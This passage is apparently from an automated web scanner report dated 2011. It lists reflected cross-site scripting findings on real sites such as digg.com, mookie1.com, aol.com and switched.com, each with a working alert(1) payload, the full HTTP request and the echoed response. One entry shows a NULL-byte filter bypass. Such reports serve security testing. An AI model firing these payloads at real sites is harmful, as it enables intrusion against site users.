unable to fetch user widget: http://terminal3.buzzfeed.com/bf2/_user_widget?or=vb&wid=1&to=1&u=popeaterc17bd<script> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0016d7e"><script>alert(1)</script>7af3d5b7b03 was submitted in the REST URL parameter 1. This input was echoed as 16d7e"><script>alert(1)</script>7af3d5b7b03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0016d7e"><script>alert(1)</script>7af3d5b7b03 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5623a"><script>alert(1)</script>d0b27ad4f84 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM5623a"><script>alert(1)</script>d0b27ad4f84/2010DM/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdebb"><script>alert(1)</script>b54197732d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMbdebb"><script>alert(1)</script>b54197732d3/1117431738@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 803d1"><script>alert(1)</script>26ba130f8ba was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1117431738@x23803d1"><script>alert(1)</script>26ba130f8ba?USNetwork/RS_SDYN_2011Q1_AOL_DEF_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 325
Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 28c2a"><script>alert(1)</script>771ead1711a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM28c2a"><script>alert(1)</script>771ead1711a/2010DM/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0abe"><script>alert(1)</script>8b2842306a2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMa0abe"><script>alert(1)</script>8b2842306a2/11485203807@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:15 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f91"><script>alert(1)</script>71d3e73a096 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/11485203807@x2361f91"><script>alert(1)</script>71d3e73a096?USNetwork/RS_SELL_2011Q1_AOL_CPA_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6c45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c52a9"><script>alert(1)</script>3157c2acd71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMc52a9"><script>alert(1)</script>3157c2acd71/2010DM/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f603e"><script>alert(1)</script>27d19133c5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMf603e"><script>alert(1)</script>27d19133c5/1628576703@x23?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:08 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a5cc"><script>alert(1)</script>f02ef969490 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1628576703@x239a5cc"><script>alert(1)</script>f02ef969490?USNetwork/RS_SELL_2011Q1_AOL_CPA_300 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.parentdish.com/_uac/adpage.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2545525d5f4f58455e445a4a423660; session=1297024969|1297024970
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:52:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62000"><script>alert(1)</script>f73671ebfb0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM62000"><script>alert(1)</script>f73671ebfb0/2010DM/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:13 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bedb1"><script>alert(1)</script>bd5553a3aa was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMbedb1"><script>alert(1)</script>bd5553a3aa/1671449763@x23?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:15 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 332
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72819"><script>alert(1)</script>6bd426211c5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/1671449763@x2372819"><script>alert(1)</script>6bd426211c5?USNetwork/RS_SDYN_2011Q1_AOL_DEF_160 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://at.atwola.com/adiframe/3.0/5113.1/221794/0/-1/size=160x600;noperf=1;alias=93218262;cfp=1;noaddonpl=y;kvpg=gadling;kvugc=0;kvui=e107840a322911e0a718c3f47aca732a;kvmn=93218262;target=_blank;aduho=-360;grp=25025865;misc=25025865
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 20:43:17 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 326
Content-Type: text/html
Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 794ee"-alert(1)-"6f9e676b6eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /toolbar794ee"-alert(1)-"6f9e676b6eb HTTP/1.1
Host: downloads.channel.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.0 404 Not Found
set-cookie: dcisid=3244900364.789990733.3152676352; path=/
Set-Cookie: bandType=broadband;DOMAIN=.aol.com;PATH=/;
Pragma: no-cache
Cache-Control: no-store
MIME-Version: 1.0
Date: Sun, 06 Feb 2011 20:19:36 GMT
Server: AOLserver/4.0.10
Content-Type: text/html
Content-Length: 8537
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- START PAGE: acp-lm30 -->
<html xmlns="http://www.w3.org/1999/xhtml" x
...[SNIP]...
<!--
s_265.mmxgo=false;
s_265.pageName="Page Not Found";
s_265.channel="us.downloads";
s_265.trackExternalLinks="true";
s_265.prop1="toolbar794ee"-alert(1)-"6f9e676b6eb";
s_265.pfxID="brw";
s_265.disablepihost=false;
s_265.prop12="http://downloads.channel.aol.com/toolbar794ee\"-alert(1)-\"6f9e676b6eb";
s_265.linkInternalFilters="javascript:,aol.com";
var s_code=s_265
...[SNIP]...
1.92. http://downloadsquad.switched.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://downloadsquad.switched.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62c89"><script>alert(1)</script>de3d7e413b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?62c89"><script>alert(1)</script>de3d7e413b9=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/?62c89"><script>alert(1)</script>de3d7e413b9=1"/>
...[SNIP]...
1.93. http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60107"><script>alert(1)</script>f339a23027b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1 HTTP/1.1
Host: downloadsquad.switched.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
<link rel="canonical" href="http://downloadsquad.switched.com/2011/02/05/cooliris-liveshare-brings-slick-group-photo-sharing-to-windows-p/?60107"><script>alert(1)</script>f339a23027b=1"/>
...[SNIP]...
1.94. http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ebd1"><script>alert(1)</script>f18dae81e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1 HTTP/1.1 Host: downloadsquad.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <link rel="canonical" href="http://downloadsquad.switched.com/2011/02/06/debian-6-squeeze-the-universal-operating-system-finally-releas/?9ebd1"><script>alert(1)</script>f18dae81e83=1"/> ...[SNIP]...
1.95. http://downloadsquad.switched.com/2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/ [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 271c2"><script>alert(1)</script>4f9f1e70ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/sumatra-pdf-version-1-3-improves-performance-printing/?271c2"><script>alert(1)</script>4f9f1e70ef=1 HTTP/1.1 Host: downloadsquad.switched.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 49eb5<script>alert(1)</script>c7ecb15712e was submitted in the callback parameter. This input was echoed unmodified in the application's response. Note that the response below is served with Content-Type: text/javascript, so the injected tag is not parsed as HTML there; what this entry actually shows is a JSONP callback name written into a script body without validation, the same weakness the jscallback entries that follow exhibit.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
